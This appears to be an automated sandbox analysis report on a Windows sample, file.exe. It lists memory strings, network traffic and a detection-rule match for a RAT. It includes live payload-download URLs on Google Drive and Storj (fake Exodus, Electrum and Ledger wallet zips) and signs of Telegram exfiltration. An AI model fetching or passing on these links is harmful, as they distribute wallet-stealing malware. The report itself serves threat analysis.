Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxtin
Source: file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
Source: file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.co
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
Source: file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.co
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
Source: file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353831153.00000232188F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
Source: file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
Source: file.exeString found in binary or memory: https://drive.google.com/uc?id=
Source: file.exe, 00000002.00000002.1503968722.0000012D10359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: file.exe, 00000002.00000003.1464989617.0000012D10359000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadB(
Source: file.exe, 00000002.00000002.1503968722.0000012D102E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download~NJ
Source: file.exeString found in binary or memory: https://drive.google.com/uc?id=URL:
Source: file.exe, 00000000.00000003.1441377935.000002321892D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1463728013.000002321892D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.000002321892D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/w
Source: file.exe, 00000002.00000003.1464255067.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Agent:
Source: file.exe, 00000002.00000003.1464989617.0000012D10359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/T)
Source: file.exe, 00000002.00000003.1464989617.0000012D10371000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464885249.0000012D103AB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464885249.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464255067.0000012D103AB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464739332.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1389602799.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464255067.0000012D10393000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10369000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464255067.0000012D103BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: file.exe, 00000000.00000003.1441284077.000002321896A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441337400.000002321896D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadK$
Source: file.exe, 00000002.00000003.1464739332.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadb
Source: file.exe, 00000002.00000003.1464739332.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1464255067.0000012D103BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadi
Source: file.exe, 00000002.00000003.1464989617.0000012D10328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/load_g
Source: file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1462458747.000002321896D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D103BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10369000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1503968722.0000012D10374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/&
Source: file.exe, 00000000.00000003.1463728013.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/S
Source: file.exe, 00000000.00000003.1461383595.0000023218964000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1462458747.000002321896D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/W
Source: file.exeString found in binary or memory: https://ipinfo.io/json
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonFd
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonJd
Source: file.exeString found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
Source: file.exe, 00000002.00000002.1503968722.0000012D10304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonbd
Source: file.exe, 00000000.00000003.1463728013.0000023218955000.00000004.00000020.00020000.00000000.sdmp, json[1].json.2.dr, json[1].json.0.drString found in binary or memory: https://ipinfo.io/missingauth
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
Source: file.exeString found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js00F7FC9
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js313AE9E
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/
Source: file.exe, 00000002.00000003.1360968091.0000012D1030E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361126576.0000012D10313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/i
Source: file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsF6DFAA4C
Source: file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
Source: file.exe, 00000002.00000003.1360968091.0000012D1030E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361126576.0000012D10313000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361147206.0000012D10318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/;T
Source: file.exe, 00000002.00000003.1361064723.0000012D10341000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/F
Source: file.exe, 00000000.00000003.1354165171.00000232188F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/om/
Source: file.exe, 00000000.00000003.1354266433.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354180465.000002321891C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354458754.000002321891D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/p
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361452113.0000012D1034E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly7FCBCD79ema
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361501894.0000012D10310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyCE89A621_na
Source: file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354224937.0000023218911000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354061434.0000023218911000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1354379801.0000023218915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1490397342.0000023218906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore1
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore58EE5
Source: file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361088766.0000012D1032A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreP
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: file.exe, 00000000.00000003.1353854851.00000232188FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1353888422.000002321890D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra)
Source: file.exe, 00000002.00000003.1361033757.0000012D10328000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1361088766.0000012D1032A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1360996024.0000012D1031E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra8
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra9C39B082BD9B3
Source: file.exe, 00000002.00000003.1361292295.0000012D1032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: file.exe, 00000002.00000003.1361274764.0000012D10306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox8D3D5EeB
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.9:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49749 version: TLS 1.2

System Summary

barindex
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].jsonJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].jsonJump to behavior
Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC13CE00_2_00007FF7ABC13CE0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC07C500_2_00007FF7ABC07C50
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC09B000_2_00007FF7ABC09B00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC0CA900_2_00007FF7ABC0CA90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC069700_2_00007FF7ABC06970
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC110F00_2_00007FF7ABC110F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC15EC00_2_00007FF7ABC15EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC05D600_2_00007FF7ABC05D60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC14D200_2_00007FF7ABC14D20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC3E4400_2_00007FF7ABC3E440
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC183F00_2_00007FF7ABC183F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5D2C80_2_00007FF7ABC5D2C8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5E1700_2_00007FF7ABC5E170
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC061900_2_00007FF7ABC06190
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC0E7900_2_00007FF7ABC0E790
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC0B6000_2_00007FF7ABC0B600
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5ACDC0_2_00007FF7ABC5ACDC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC4ACDC0_2_00007FF7ABC4ACDC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC34D100_2_00007FF7ABC34D10
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC36CB00_2_00007FF7ABC36CB0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC54C100_2_00007FF7ABC54C10
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC4EAF80_2_00007FF7ABC4EAF8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5DAD40_2_00007FF7ABC5DAD4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC01A200_2_00007FF7ABC01A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC2EA200_2_00007FF7ABC2EA20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC090300_2_00007FF7ABC09030
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC520400_2_00007FF7ABC52040
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC010000_2_00007FF7ABC01000
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC280100_2_00007FF7ABC28010
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC4F0040_2_00007FF7ABC4F004
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC31F300_2_00007FF7ABC31F30
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC50F300_2_00007FF7ABC50F30
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC12EF00_2_00007FF7ABC12EF0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5FDA00_2_00007FF7ABC5FDA0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5ED1C0_2_00007FF7ABC5ED1C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC53D400_2_00007FF7ABC53D40
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC0E4AA0_2_00007FF7ABC0E4AA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC4A4940_2_00007FF7ABC4A494
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC3D4100_2_00007FF7ABC3D410
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC383A00_2_00007FF7ABC383A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC013D00_2_00007FF7ABC013D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC652F00_2_00007FF7ABC652F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC622980_2_00007FF7ABC62298
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC4A2900_2_00007FF7ABC4A290
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC4B1E40_2_00007FF7ABC4B1E4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5A1C80_2_00007FF7ABC5A1C8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC121C00_2_00007FF7ABC121C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC301900_2_00007FF7ABC30190
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC2F9100_2_00007FF7ABC2F910
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC0D8A60_2_00007FF7ABC0D8A6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC518B80_2_00007FF7ABC518B8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC098300_2_00007FF7ABC09830
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC017A00_2_00007FF7ABC017A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC297C00_2_00007FF7ABC297C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC637740_2_00007FF7ABC63774
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC357200_2_00007FF7ABC35720
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC6070C0_2_00007FF7ABC6070C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC4A6980_2_00007FF7ABC4A698
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC386C00_2_00007FF7ABC386C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5A65C0_2_00007FF7ABC5A65C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7ABC5D5440_2_00007FF7ABC5D544
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22F39904_2_00007FF6A22F3990
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A23073E84_2_00007FF6A23073E8
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A2303BD04_2_00007FF6A2303BD0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22F4C004_2_00007FF6A22F4C00
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A23114A44_2_00007FF6A23114A4
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22F54C04_2_00007FF6A22F54C0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A23081A44_2_00007FF6A23081A4
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A23129B44_2_00007FF6A23129B4
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A230E2004_2_00007FF6A230E200
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A230FA544_2_00007FF6A230FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A2305B144_2_00007FF6A2305B14
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A230EDA04_2_00007FF6A230EDA0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF6A22FCD7C4_2_00007FF6A22FCD7C
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF7ABC260E0 appears 31 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF7ABC392E0 appears 33 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF7ABC1F4A0 appears 112 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF7ABC244A0 appears 127 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF7ABC208C0 appears 31 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF7ABC38F10 appears 31 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF7ABC21B10 appears 35 times
Source: file.exeBinary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: file.exe, 00000002.00000000.1339083068.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: file.exeBinary or memory string: OriginalFilenamewusvc4 vs file.exe
